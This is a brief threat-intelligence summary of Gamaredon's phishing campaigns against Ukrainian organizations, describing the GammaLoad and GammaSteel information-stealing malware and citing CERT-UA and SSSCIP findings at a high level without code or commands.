Relentless Phishing from Gamaredon

Russian state-sponsored threat group, Gamaredon has been unrelenting in their phishing campaigns to distribute information-stealing malware against Ukrainian organizations. Two variants of the malware have been deployed, GammaLoad the PowerShell variant, and GammaSteel the .Net variant. Analysis from the State Special Communications Service of Ukraine (SSSCIP), identified all GammaLoad variants observed "are VBScript droppers, that use similar obfuscation techniques (base-64 encoding, text strings replaces) and are designed to abuse the trusted, signed system utilities (WMI, mshta.exe , wscript.exe , powershell.exe) in order to maintain persistence (through scheduled tasks creation, autorun registry keys modification) and download next-stage VBScript droppers from C2 servers. Each next stage downloaded payloads’ specialty is communication with a different C2 server."

Gamaredon's phishing campaigns often impersonate Ukrainian officials or leverage topics associated with the geopolitical situation. The infection chain begins from the execution of an attached archive file carrying a Windows shortcut (lnk) file to trigger a round of LOLBins executables to bring down GammaLoad or GammaSteel malware. The malware is used to steal user credentials, exfiltrate files, and take screenshots. Most of Gamaredon targets involve organizations in critical infrastructure, defense, security, law enforcement, and government. Gamaredon's activity is highlighted by a spokesperson from Ukrainian Computer Emergency Response Team (CERT-UA) stating that “Not a week went by that we didn’t detect some new mass phishing email campaign with Gamaredon malware.” At least 70 incidents were attributed to Gamaredon in 2022 by CERT-UA.